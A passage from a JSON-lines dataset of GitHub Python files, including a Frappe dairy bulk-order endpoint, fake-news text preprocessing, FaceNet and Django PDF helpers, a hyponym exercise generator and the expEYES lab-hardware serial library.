compressed=True):\n if not Object.debugger:\n Object.debugger= Debugger (fileName, compressed)\n self.debug (1, 'o: logging in %s' % fileName)\n else:\n # self.debug (1, 'debugger already there')\n pass\n\n def log (self, s):\n if self.debugger:\n self.debugger.log (s)\n\n def debug (self, i, s, level=1, fast=True):\n if self.debugger:\n self.debugger.debug (i, s, level, fast)\n\n def saveLog (self):\n if self.debugger:\n self.debugger.saveLog 
()\n","repo_name":"StyXman/Trieste","sub_path":"Trieste/common/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22192492278","text":"import frappe\nimport json\nimport math\n\nfrom frappe.utils.data import flt\n# from frappe.utils import getdate\ndef get_context(context):\n context.items = frappe.get_list(\"Website Item\", filters={'published': 1}, fields=[\"item_name\", \"item_code\",\"website_image\"],order_by=\"item_name asc\")\n\n\n@frappe.whitelist()\ndef make_so(item_list):\n \n customer_name = None\n all_contact_doc_name = frappe.db.get_all(\"Contact\",{\"user\":frappe.session.user},['user','name'])\n for con in all_contact_doc_name:\n # try:\n contact_doc = frappe.get_doc(\"Contact\", con)\n link_table = contact_doc.get('links')\n if(len(link_table) > 0):\n customer_name = link_table[0].get('link_name')\n item_with_all_data = []\n for item in json.loads(item_list):\n if (item.get(\"qty\")):\n if int(item.get('qty')) > 0:\n fetch_details = frappe.db.get_all(\"Website Item\",{\"item_code\" : item.get('item_code')},[\"item_name\", \"item_code\",\"website_image\"])\n print(\"888888888888888888888888888888888888\",fetch_details)\n for i in fetch_details:\n item['item_name'] = i.item_name\n item['website_image'] = i.website_image\n item_with_all_data.append(item)\n\n cache = frappe.cache()\n print(\"************************\",item_with_all_data)\n saor=frappe.db.get_value(\"Sales Order\",{\"name\":cache.get_value(\"so_name\"),\"docstatus\":0,\"delivery_shift\":cache.get_value(\"delivery_shift\").title() if cache.get_value(\"delivery_shift\") else \"Morning\"},\"name\")\n if not saor:\n so = frappe.new_doc(\"Sales Order\")\n so.company = frappe.db.sql(\"select name from `tabCompany`;\")[0][0]\n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", \"price_list\")\n # if not get_price_list:\n # 
frappe.throw('Please select price list in Bulk Order Settings')\n so.customer = customer_name\n cache.set_value('customer_name', customer_name)\n f=frappe.get_doc(\"Customer\", so.customer )\n print(\"uuuuuuuuuuuuuuuuuuuuuuuu\",f)\n so.price_list=f.default_price_list\n # so.price_list = get_price_list\n so.order_type = \"Shopping Cart\"\n so.transaction_date = frappe.utils.nowdate()\n del_date = None\n del_date = cache.get_value(\"del_date\")\n if not del_date:\n del_date = frappe.utils.nowdate()\n so.delivery_date=del_date\n item_rate=0\n if cache.get_value(\"delivery_shift\"):\n delivery_shift = cache.get_value(\"delivery_shift\").title()\n\n else:\n delivery_shift=\"Morning\"\n so.delivery_shift=delivery_shift\n website_warehouse = frappe.db.get_single_value(\"Bulk Order Settings\", 'default_warehouse')\n print(\"item******************************\",json.loads(item_list))\n for data in json.loads(item_list):\n print(\"89999999999999999999111111\",data)\n if (data.get(\"qty\")):\n if(int(data.get(\"qty\")) > 0):\n if not website_warehouse:\n m = \"warehouse not found for item {0}
please set default warehouse in bulk order settings \".format(data.get(\"item_code\"))\n msg = {\n 'status': False,\n 'msg': m\n }\n return msg\n \n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", 'price_list')\n \n item_rate = frappe.db.get_value(\"Item Price\", {'item_code':data.get('item_code'),'price_list': f.default_price_list} , \"price_list_rate\")\n \n item = {\n \"item_code\" : data.get(\"item_code\"),\n \"delivery_date\" : del_date,\n \"qty\" : data.get(\"qty\"),\n \"rate\" : item_rate,\n \"conversion_rate\":1,\n \"stock_qty\":flt(data.get(\"qty\"))*1,\n \"uom\":data.get(\"uom\"),\n \"warehouse\" : website_warehouse\n }\n so.append(\"items\", item)\n try:\n so.insert(ignore_permissions=True)\n cache.set_value('so_name', so.name)\n # print(\"$$$$$$$$$$$$$$$$$$$$$$$$$$\",item_with_all_data)\n for item in so.items:\n a=0\n for i in item_with_all_data:\n if (i.get('item_code') == item.get('item_code')) and a==0:\n a=1\n doc=frappe.get_doc(\"Item\",i.get('item_code'))\n item.uom=doc.stock_uom\n i['rate'] = item.get('rate')\n i['amount'] = item.get('amount')\n i['uom']= doc.stock_uom\n so.save(ignore_permissions=True)\n print(\"$$$$$$$$55555666666666666666\",item_with_all_data)\n cache.set_value('item_list', item_with_all_data)\n cache.set_value('rounded_up_total', so.rounded_total)\n cache.set_value('rounding_adjustment', so.rounding_adjustment)\n cache.set_value('total_amount', so.grand_total)\n cache.set_value('default_cust_add', so.customer_address)\n cache.set_value('default_ship_add', so.shipping_address_name)\n\n\n\n return {\n 'status': True,\n 'so_name': so.name\n }\n except:\n return False\n \n else:\n sal_ord=frappe.get_doc(\"Sales Order\",saor)\n print(\"5555555555555555222222222222\",sal_ord)\n sal_ord.company = frappe.db.sql(\"select name from `tabCompany`;\")[0][0]\n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", \"price_list\")\n # if not get_price_list:\n # frappe.throw('Please select price list in 
Bulk Order Settings')\n sal_ord.customer = customer_name\n print(\"uuuuuuuuut666666666666666666666667\",customer_name)\n cache.set_value('customer_name', customer_name)\n f=frappe.get_doc(\"Customer\", sal_ord.customer )\n print(\"7777777777777777777777777777777777\",f)\n sal_ord.price_list=f.default_price_list\n # so.price_list = get_price_list\n sal_ord.order_type = \"Shopping Cart\"\n sal_ord.transaction_date = frappe.utils.nowdate()\n del_date = None\n del_date = cache.get_value(\"del_date\")\n if not del_date:\n del_date = frappe.utils.nowdate()\n print(\"8888888888888888888888888888888888\",del_date)\n sal_ord.delivery_date=del_date\n item_rate=0\n if cache.get_value(\"delivery_shift\"):\n delivery_shift = cache.get_value(\"delivery_shift\").title()\n\n else:\n delivery_shift=\"Morning\"\n sal_ord.delivery_shift=delivery_shift\n website_warehouse = frappe.db.get_single_value(\"Bulk Order Settings\", 'default_warehouse')\n for data in json.loads(item_list):\n print(\"2111111111111111111111111111\",data)\n if (data.get(\"qty\")):\n if(int(data.get(\"qty\")) > 0):\n if not website_warehouse:\n m = \"warehouse not found for item {0}
please set default warehouse in bulk order settings \".format(data.get(\"item_code\"))\n msg = {\n 'status': False,\n 'msg': m\n }\n return msg\n \n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", 'price_list')\n \n item_rate = frappe.db.get_value(\"Item Price\", {'item_code':data.get('item_code'),'price_list': f.default_price_list} , \"price_list_rate\")\n k=[]\n for j in sal_ord.items:\n k.append(j.item_code)\n for j in sal_ord.items:\n if j.item_code==data.get(\"item_code\"):\n j.qty= data.get(\"qty\")\n\n j.rate=item_rate\n else:\n if data.get(\"item_code\") not in k:\n item = {\n \"item_code\" : data.get(\"item_code\"),\n \"delivery_date\" : del_date,\n \"qty\" : data.get(\"qty\"),\n \"rate\" : item_rate,\n \"conversion_rate\":1,\n \"uom\":data.get(\"uom\"),\n \"stock_qty\":flt(data.get(\"qty\"))*1,\n \"warehouse\" : website_warehouse\n }\n sal_ord.append(\"items\", item)\n print(\"88888888888888832\",item)\n try:\n sal_ord.save(ignore_permissions=True)\n cache.set_value('so_name', sal_ord.name)\n for item in sal_ord.items:\n a=0\n for i in item_with_all_data:\n if (i.get('item_code') == item.get('item_code')) and a==0:\n a=1\n doc=frappe.get_doc(\"Item\",i.get('item_code'))\n item.uom=doc.stock_uom\n i['rate'] = item.get('rate')\n i['amount'] = item.get('amount')\n i['uom'] = doc.stock_uom\n so.save(ignore_permissions=True)\n\n cache.set_value('item_list', item_with_all_data)\n cache.set_value('rounded_up_total', sal_ord.rounded_total)\n cache.set_value('rounding_adjustment', sal_ord.rounding_adjustment)\n cache.set_value('total_amount', sal_ord.grand_total)\n cache.set_value('default_cust_add', sal_ord.customer_address)\n cache.set_value('default_ship_add', sal_ord.shipping_address_name)\n\n\n return {\n 'status': True,\n 'so_name': sal_ord.name\n }\n except:\n return False\n\n@frappe.whitelist()\ndef handle_date(date):\n frappe.cache().set_value(\"del_date\", date)\n\n@frappe.whitelist()\ndef handle_shift(shift):\n 
frappe.cache().set_value(\"delivery_shift\",shift) \n return shift\n\n \n\n","repo_name":"Pradip2113/dairy","sub_path":"dairy/www/bulk_order.py","file_name":"bulk_order.py","file_ext":"py","file_size_in_byte":10365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15616136301","text":"import csv\nimport nltk\nimport numpy as np\n\nfrom nltk.corpus import stopwords\nfrom gensim.models import Word2Vec\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef get_duration(st, et):\n minutes = int((et - st) / 60)\n seconds = (et - st) % 60\n duration = f\"{minutes} min {seconds:.2f} sec\"\n return duration\n\n\ndef check_periods(full_text):\n checked_text = []\n for char in full_text:\n if char in ['.', ',', ':', ';']:\n char = char + \" \"\n checked_text.append(char)\n return \"\".join(checked_text)\n\n\ndef preprocess_line(line):\n sent_tokens = [word.casefold() for word in nltk.tokenize.word_tokenize(line)]\n processed_tokens = []\n for word in sent_tokens:\n if word.isalpha():\n processed_tokens.append(word)\n elif word.isnumeric():\n processed_tokens.append(\"\")\n return processed_tokens\n\n\ndef preprocess(text):\n all_lines = []\n all_tokens = []\n for line in nltk.tokenize.sent_tokenize(text):\n all_lines.append(line)\n processed_tokens = preprocess_line(line)\n all_tokens.append(processed_tokens)\n return all_lines, all_tokens\n\n\ndef get_all_texts(fraction=1):\n all_titles = []\n all_texts = []\n all_proc_texts = []\n true_or_fake = []\n with open(\"data/Fake.csv\", \"r\") as csvfile:\n for row in csv.reader(csvfile):\n title, text, _, _ = row\n text = check_periods(text)\n all_titles.append(title)\n all_texts.append(text)\n all_proc_texts.append(preprocess(text))\n true_or_fake.append(1)\n with open(\"data/True.csv\", \"r\") as csvfile:\n for row in csv.reader(csvfile):\n title, text, _, _ = row\n text = check_periods(text)\n all_titles.append(title)\n all_texts.append(text)\n 
all_proc_texts.append(preprocess(text))\n true_or_fake.append(0)\n return all_titles, all_texts, all_proc_texts, true_or_fake\n\n\ndef get_clusters():\n clusters = []\n with open(\"data/clusters.txt\", \"r\") as source:\n for line in source:\n clusters.append(int(line.rstrip()))\n return clusters\n\n\ndef get_word_embedding(word, model):\n sw = stopwords.words('english')\n try:\n word_emb = model.wv[word]\n except:\n word_emb = 0\n if word in sw:\n word_emb = word_emb * 0.5\n return word_emb\n\n\ndef get_sent_embedding(sent_tokens, model):\n sent_embedding = np.zeros([100,])\n for word in sent_tokens:\n tok_emb = get_word_embedding(word, model=model)\n sent_embedding += tok_emb\n return sent_embedding\n\n\ndef get_text_embedding(prep_text, model):\n text_embedding = np.zeros([100,])\n for sent in prep_text:\n sent_emb = get_sent_embedding(sent, model=model)\n text_embedding += sent_emb\n return text_embedding\n\n\ndef get_bow(texts_list, sw=\"english\"):\n return CountVectorizer(stop_words=sw).fit_transform(texts_list).toarray()\n","repo_name":"mgrafu/CUNY-AI-FakeNews","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20903086600","text":"from facenet.src import facenet\nimport tensorflow as tf\nfrom app.domain.face.align import detect_face\n\n\ndef getModel():\n sess = tf.Session()\n # read pnet, rnet, onet models from align directory and files are det1.npy, det2.npy, det3.npy\n pnet, rnet, onet = detect_face.create_mtcnn(sess, 'app/models/align')\n\n # read 20170512-110547 model file downloaded from https://drive.google.com/file/d/0B5MzpY9kBtDVZ2RpVDYwWmxoSUk\n facenet.load_model(\"app/models/model/tfmodel.pb\")\n\n # Get input and output tensors\n images_placeholder = tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n 
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n\n return (sess, pnet, rnet, onet,images_placeholder, embeddings, phase_train_placeholder )","repo_name":"italojs/flask-face-similarity","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2927871589","text":"import unittest\nimport l370b\n\n\nclass testSolution(unittest.TestCase):\n\n def setUp(self):\n self.s = l370b.Solution()\n\n #@unittest.skip(\"wait\")\n def test_solution(self):\n words = [\"area\",\"lead\",\"wall\",\"lady\",\"ball\"]\n expected = [\n [ \"wall\",\n \"area\",\n \"lead\",\n \"lady\"\n ],\n [ \"ball\",\n \"area\",\n \"lead\",\n \"lady\"\n ]\n ]\n got = self.s.wordSquares(words)\n self.assertItemsEqual(got, expected)\n #import pdb;pdb.set_trace()\n words = [\"abat\",\"baba\",\"atan\",\"atal\"]\n expected = [\n [ \"baba\",\n \"abat\",\n \"baba\",\n \"atan\"\n ],\n [ \"baba\",\n \"abat\",\n \"baba\",\n \"atal\"\n ]\n ]\n got = self.s.wordSquares(words)\n self.assertItemsEqual(got, expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SolbiatiAlessandro/pyComPro","sub_path":"leetcode/google/370/test_370b.py","file_name":"test_370b.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"29707451224","text":"from django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlquote\nfrom weasyprint import HTML\n\n\ndef encode_filename(filename):\n \"\"\"\n Encodes filename part for ``Content-Disposition: attachment``.\n\n filename=\"abc.pdf\" => filename=abc.pdf\n filename=\"aa bb.pdf\" => filename*=UTF-8''aa%20bb.pdf\n filename=u\"zażółć.pdf\" => filename*=UTF-8''za%C5%BC%C3%B3%C5%82%C4%87.pdf\n \"\"\"\n\n quoted = urlquote(filename)\n if 
quoted == filename:\n return \"filename=%s\" % filename\n else:\n return \"filename*=UTF-8''%s\" % quoted\n\n\ndef make_response(content, filename=None, content_type=\"application/pdf\"):\n \"\"\"\n Wraps content into HTTP response.\n\n If ``filename`` is specified then ``Content-Disposition: attachment``\n header is added to the response.\n\n Default ``Content-Type`` is ``application/pdf``.\n\n :param bytes content: response content\n :param str filename: optional filename for file download\n :param str content_type: response content type\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n response = HttpResponse(content, content_type=content_type)\n if filename is not None:\n response[\"Content-Disposition\"] = \"attachment; {}\".format(\n encode_filename(filename)\n )\n return response\n\n\ndef render_to_pdf(request, template, context, base_url=None, filename=None, stylesheets=None):\n return make_response(\n content=HTML(\n string=render_to_string(\n request=request,\n template_name=template,\n context=context\n ),\n base_url=base_url or request.build_absolute_uri()\n ).write_pdf(stylesheets=stylesheets),\n filename=filename\n )","repo_name":"velafrica/velafrica-django","sub_path":"velafrica/core/pdf_utils.py","file_name":"pdf_utils.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72456072679","text":"import procesamientos.oraciones as orac\nimport procesamientos.hiponimos as hip\nfrom recursos.categorias import Categorias\nfrom procesamientos.sustantivos import es_sustantivo\nfrom procesamientos.procesamiento import obtener_palabras, es_adjetivo\nimport nltk\nfrom pattern.en import lemma\n\nclass ItemEjercicioHiponimos():\n\n def __init__(self, palabra, categoria):\n self.palabra = palabra\n self.categoria = categoria\n\nclass EjercicioHiponimos():\n def __init__(self, parrafo, ejercicio = None):\n self.parrafo = parrafo\n self.numeros_siguientes = 
[]\n if not ejercicio:\n self.items = self.procesar_ejercicio_hiponimos(parrafo)\n else:\n self.items = ejercicio\n\n def procesar_ejercicio_hiponimos(self, texto):\n items_ejercicio = []\n filtro = lambda x: es_sustantivo(x) or es_adjetivo(x)\n lista_palabras = obtener_palabras(filtro, texto)\n\n lista_palabras = list({ each['token'] : each for each in lista_palabras }.values())\n for palabra in lista_palabras:\n palabra_token = lemma(palabra['token'])\n categorias = Categorias().listar_categorias()\n palabra_categoria = None\n for categoria in categorias:\n categoria_synset_id = categoria['synset_id']\n es_hiponimo = hip.es_hiponimo(palabra_token, categoria_synset_id)\n if es_hiponimo:\n palabra_categoria = categoria['nombre']\n if palabra_categoria:\n # Evitar palabras duplicadas\n if not any(obj.palabra == palabra_token for obj in items_ejercicio):\n item = ItemEjercicioHiponimos(palabra_token, palabra_categoria)\n items_ejercicio.append(item)\n return items_ejercicio\n\n def eliminar_item(self, palabra):\n self.items = list(filter(lambda x: x.palabra != palabra, self.items))\n\n def exportar_ejercicio(self):\n opciones = []\n for item in self.items:\n opcion = {\n 'palabra': item.palabra,\n 'categoria': item.categoria\n }\n opciones.append(opcion)\n categorias = [cat['nombre'] for cat in Categorias().listar_categorias()]\n ejercicio = {\n 'texto_original': self.parrafo,\n 'opciones': opciones,\n 'categorias': categorias,\n 'tipo': 'hiponimos'\n }\n return ejercicio\n","repo_name":"joacolej/proygrado","sub_path":"src/ejercicios/ejercicio_hiponimos.py","file_name":"ejercicio_hiponimos.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22097182886","text":"'''\nEYES for Young Engineers and Scientists (EYES 1.0)\nPython library to communicate to the AtMega32 uC running 'eyes.c'\nAuthor : Ajith Kumar B.P, bpajith@gmail.com\nLicense : GNU GPL version 3\nStarted 
on 1-Nov-2010\nLast Edit : 13-Oct-2011 : Added MCP2200 support (for version 2)\nLast Edit : 4-Nov-2011 : DAC maximum set to 5.000 volts\n\n\nThe hardware consisists of :\n1) 2 Digital Inputs\n2) 2 Digital Outputs\n3) 2 DAC channels\n4) 8 ADC channels (only 6 used)\n 0,1 : -5V to 5V inputs\n 2 : 0 to 5V input\n\n5) 1 Square wave generator using ATmega32\n6) 1 Square wave generator using IC555 (frequency range selectable through Atmega32)\n7) 1 Pulse Width Modulator Output using ATmega32\n8) A 100 Hz sine wave generator, bipolar\n9) 1 Current source controlled by DAC channel 1\n10)1 Non-Inverting Amplifier using OP27, gain can be set by an external resistor\n11)1 Inverting amplifier, gain can be selected using a series resistance at the input\n12)2 Inverting amplifiers with gain = 47 , mainly used for microphones. \n'''\nfrom __future__ import print_function\n\nfrom subprocess import run\nimport serial, struct, math, time, sys, os, glob, fnmatch\n\nimport gettext\ngettext.bindtextdomain(\"expeyes\")\ngettext.textdomain('expeyes')\n_ = gettext.gettext\n\n\n#Commands with One byte argument (41 to 80) \nGETVERSION = 1\nDIGIN = 2 # Digital Input (4 bits)\nUSOUND = 3 # Pulse OD1 to get rising edge on ID2(internal)\n\n#Commands with One byte argument (41 to 80) \nSETSAMTIME = 41 # MCP3208 sampling duration\nSETADCSIZE = 42\nREADADC = 43 #Read the specified ADC channel\nR2FTIME = 44 # Rise to Fall of signal on input pins\nR2RTIME = 45 # Rise to Fall of signal on input pins\nF2RTIME = 46 # Fall to Rise of signal on input pins\nF2FTIME = 47 # Fall to Rise of signal on input pins\nSET2RTIME = 48 # Setting of bit to rising edge\nSET2FTIME = 49 # to falling time\nCLR2RTIME = 50 # Setting of bit to rising edge\nCLR2FTIME = 51 # to falling time\nPULSE2RTIME = 52 # Pulse to rising edge\nPULSE2FTIME = 53 # Pulse to rising edge\nSETPULSEWID = 54 # width for PULSE2 functions (0 to 250)\nSETPULSEPOL = 55 # PULSE polarity (0 for HIGH true)\nDIGOUT = 56 # Digital output (4 bits)\nADC2CMP 
= 57 # Route ADC input to ACOMP-\nSETPWM = 58 # Set 488 Hz PWM wave on TC0\nSETPWMDAC = 59 # Set 31.25 kHz PWM wave on TC0\nGETPORT = 60 # PINX data from port X\nIRSEND = 61 # Send 8 bit data on SQR1, using infrared LED\n\n# Commands with Two bytes argument (81 to 120)\nSETPWM0 = 81 # PWM on on OSC0\nSETCOUNTER0 = 82 # Square wave on OSC0\nSETCOUNTER2 = 83 # Square wave on OSC2\nSETACTION = 84 # Capture Actions of SET/CLR type\nMULTIR2R = 85 # Rising edge to a rising edge after N cycles\nADCTRIGS = 86 # Trigger levels for read_block functions\nSETWAVEFORM = 87 # ISR Wavegen. OCR0 and which DAC from the caller\nPULSE_D0D1 = 88 # Interrupt driven square wave on D0 and D1\nSETDDR = 90 # DDRX = dirmask (arg1 = X, arg2 = mask)\nSETPORT = 91 # PORTX = DATA (arg1 = X, arg2 = DATA)\n\n# Commands with Three bytes argument (121 to 160) \nSETDAC = 121 # Serial DAC: send ch, dlo & dhi\nQCAPTURE01 = 122 # 2 bytes N, 1 byte dt. captures channel 0 and 1\nWREEPROM = 123 # Write EEPROM , 2 byte addr & 1 byte data\nRDEEPROM = 124 # Read EEPROM , 2 byte addr , 1 byte nb\n\n#Commands with Four bytes argument (161 to 200)\nCAPTURE01 = 161 # 2 bytes N, 2 bytes dt. Capture channel 0 and 1\nQCAPTURE = 162 # Ch, 2 byte N, 1 byte dt.\n\n#Commands with Five bytes argument (201 to 240)\nCAPTURE = 201 # Ch, 2 byte N, 2 byte dt. Capture from MCP3208 ADC\nCAPTURE_M32 = 202 # Ch, 2 byte N, 2 byte dt. Capture from ATmega32 ADC\n\n# Actions before capturing waveforms\nASET = 1\nACLR = 2\nAPULSEHI = 3\nAPULSELO = 4\nAWAITHI = 5\nAWAITLO = 6\nAWAITRISE = 7\nAWAITFALL = 8\n\nBUFSIZE = 1800 # status + adcinfo + 1800 data\n\n#Serial devices to search for EYES hardware. 
\nlinux_list = ['/dev/ttyUSB0', '/dev/ttyUSB1', '/dev/ttyUSB2',\n '/dev/ttyACM0','/dev/ttyACM1','/dev/ttyACM2',\n '/dev/cu.usbserial']\n\n\ndef open(dev = None):\n '''\n If EYES hardware in found, returns an instance of 'Eyes', else returns None.\n '''\n obj = Eyes()\n if obj.fd != None:\n obj.disable_actions()\n return obj\n print (_('Could not find Phoenix-EYES hardware'))\n print (_('Check the connections.'))\n\nDACMAX = 5.000 # MCP4922 DAC goes only up to 4.933 volts, in version 1\nBAUDRATE = 38400 # Serial communication\n\nclass Eyes:\n fd = None # init should fill this\n adcsize = 1\n m = [10.0/4095]*2 + [5.0/4095]*6 + [4095./DACMAX/2, 4095.0/DACMAX] # 8th and 9th are for DAC\n c = [-5.0]*2 + [0.0]*6 + [4095.0/2, 0]\n msg = '.'\n\n def __init__(self, dev = None):\n \"\"\"\n Searches for EYES hardware on RS232 ports and the USB-to-Serial adapters. Presence of the\n device is done by reading the version string.\n The timeout at Python end is set to 3.2 milliseconds, twice the minimum 555 output time period.\n TODO : Supporting more than one EYES on a PC to be done. 
The question is how to find out\n whether a port is already open or not, without doing any transactions to it.\n \"\"\"\n self.adcsize = 2;\n\n if os.name == 'nt':\n device_list = []\n for k in range(1,255):\n s = 'COM%d'%k\n device_list.append(s)\n for k in range(1,11):\n device_list.append(k)\n elif (os.uname()[0] == 'Darwin'):\n device_list = []\n device_list = glob.glob('/dev/cu.usbserial*')\n else:\n device_list = [] # gather unused ones from the linux_list\n for dev in linux_list:\n cp = run('lsof -t '+ str(dev), shell=True,\n capture_output=True, encoding=\"utf-8\")\n res = cp.stdout\n if res == '':\n device_list.append(dev)\n\n for dev in device_list:\n try:\n handle = serial.Serial(dev, BAUDRATE, stopbits=1, timeout = 0.3, parity=serial.PARITY_EVEN)\n except:\n continue\n print (_('Port %s is existing ')%dev,)\n if handle.isOpen() != True:\n print (_('but could not open'))\n continue\n print (_('and opened. '),)\n handle.flush()\n time.sleep(.5)\n while handle.inWaiting() > 0 :\n handle.flushInput()\n handle.write(chr(GETVERSION))\n res = handle.read(1)\n ver = handle.read(5) # 5 character version number\n if ver[:2] == 'ey':\n self.device = dev\n self.fd = handle\n self.version = ver\n handle.timeout = 4.0 # r2rtime on .7 Hz require this\n print (_('Found EYES version '),ver)\n return\n else:\n print (_('No EYES hardware detected'))\n self.fd = None\n#------------------------------------------------------------------------------------\n\n def dwrite(self,ch):\n self.fd.write(ch)\n time.sleep(0.01) #MCP2200 to ATmega transfer has no handshake\n\n#-------------------- Pulse Width Modulated Waveform on TC0 and TC2 ------------------\n def set_pwmdac(self, vout): # Value in 0 to 5V\n '''\n Sets the PULSE output (T10) to 31.25 kHz and sets the duty cycle to make the\n average voltage = vout. 
Need External RC filter to use this as a DC output.\n 0 to 5V range is covered in 255 steps and the function returns the value set.\n '''\n if 0 <= vout <= 5.0:\n val = int(vout*255.0/5.0)\n self.dwrite(chr(SETPWMDAC))\n self.dwrite(chr(val))\n self.fd.read(1)\n return val * 5.0 / 255\n\n def set_pulse(self, ds): # Dutycycle in percentage\n '''\n Sets the frequency on PULSE to 488.3 Hz. Dutycycle is set to 'ds'.\n Returns the actual value set.\n '''\n if 0 <= ds <= 100:\n val = int(ds*255.0/100)\n self.dwrite(chr(SETPWM))\n self.dwrite(chr(val))\n self.fd.read(1)\n return val * 100.0 / 255\n\n#---------------- Square Wave Generation & Measuring the Frequency ------------------\n def irsend(self, dat): # Infrared transmission\n self.dwrite(chr(IRSEND))\n self.dwrite(chr(dat))\n self.fd.read(1)\n\n def set_sqr0(self, freq): # Sets Squarewave on the PULSE output\n '''\n Sets a square wave on the PULSE output. Frequency from 15Hz to 40000000 Hz (4 MHz), but\n it is not possible to set all intermediate values.\n The function sets the nearest possible value and returns it.\n '''\n if freq < 1: # Disable squarewave on PULSE\n self.dwrite(chr(SETCOUNTER0))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n return 0\n\n div = [4000000.0, 500000.0, 125000.0, 62500.0, 31250.0,15625.0,3906.25]\n for i in range(7):\n clock_sel = i+1\n freq0 = div[i]\n if ( freq0/ freq) <= 256:\n break\n setpoint = freq0/freq\n if setpoint > 255:\n setpoint = 255\n OCR0 = int(setpoint)-1\n #print (clock_sel, OCR2)\n self.dwrite(chr(SETCOUNTER0))\n self.dwrite(chr(clock_sel))\n self.dwrite(chr(OCR0))\n res = self.fd.read(1)\n if res != 'D':\n return None\n if setpoint == 0:\n return freq0\n else:\n return freq0/(OCR0+1)\n\n def set_sqr1(self, freq): # Freq in Hertz\n '''\n Sets the output frequency of the SQR1. 
Ranges from 15Hz to 40000000 Hz (4 MHz), but\n it is not possible to set all intermediate values.\n The function sets the nearest possible value and returns it.\n '''\n if freq < 1: # Disable PWG\n self.dwrite(chr(SETCOUNTER2))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n return 0\n\n div = [4000000.0, 500000.0, 125000.0, 62500.0, 31250.0,15625.0,3906.25]\n for i in range(7):\n clock_sel = i+1\n freq0 = div[i]\n if ( freq0/ freq) <= 256:\n break\n setpoint = freq0/freq\n if setpoint > 255:\n setpoint = 255\n OCR2 = int(setpoint)-1\n #print (clock_sel, OCR2)\n self.dwrite(chr(SETCOUNTER2))\n self.dwrite(chr(clock_sel))\n self.dwrite(chr(OCR2))\n res = self.fd.read(1)\n if res != 'D':\n return None\n if setpoint == 0:\n return freq0\n else:\n return freq0/(OCR2+1)\n\n def get_sqr1(self):\n '''\n This function measures the frequency of SQR1. There is no need of this\n since set_sqr1 returns the frequency actually set.\n '''\n self.adc2cmp(6)\n t = self.multi_r2rtime(4)\n if t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def set_sqr2(self, fmax):\n '''\n This function sets the frequency range of SQR2.\n The ranges are : 0.7 to 25, 25 to 1000, 1000 to 10000 and 10000 to 90000.\n You need to adjust the 22 KOhm variable resistor to get the desired frequency\n within the selected range. Software allows you to measure the frequency while\n adjusting the resistor. 
Frequency can be set from .7 Hz to 90 KHz in different ranges.\n '''\n if fmax < 0: #PA0 to LOW, makes 555 output LOW\n self.set_ddr(0,1)\n self.set_port(0,1)\n elif fmax == 0: #PA0 to LOW, makes 555 output HIGH\n self.set_ddr(0,1)\n self.set_port(0,0)\n elif fmax<= 25:\n self.set_ddr(0, 2+4+8+16) # connect (47 + 1 + 0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax<= 1000:\n self.set_ddr(0, 2+4+8) # connect (1 + 0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax<= 10000:\n self.set_ddr(0, 2+4) # connect (0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax <= 90000: # connect 0.01 uF\n self.set_ddr(0, 2)\n self.set_port(0,0)\n elif fmax > 300000: # Oscllate with stray capacitance only\n self.set_ddr(0, 0)\n self.set_port(0,0)\n\n def get_sqr2(self):\n '''\n This function measures the frequency of SQR2 (555 oscillator).\n Call this while adjusting the frequency using the variable resistor.\n '''\n self.adc2cmp(6)\n t = self.multi_r2rtime(4)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def sensor_frequency(self):\n '''\n This function measures the frequency on the signal on SENS (T23) input.\n '''\n self.adc2cmp(5)\n t = self.multi_r2rtime(4)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def ampin_frequency(self):\n '''\n This function measures the frequency of an external BIPOLAR signal connected to Terminal 15.\n If your signal is unipolar , connect it through a 1uF series\n The amplitude must be more than 100 mV\n '''\n return self.digin_frequency(2) # Amplifier output is connected to PC2\n\n def digin_frequency(self, pin):\n '''\n This function measures the frequency of an external 0 to 5V PULSE on digital inputs.\n '''\n t = self.multi_r2rtime(pin)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(pin,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n#-------------------------------------- ADC & DAC Calibrations 
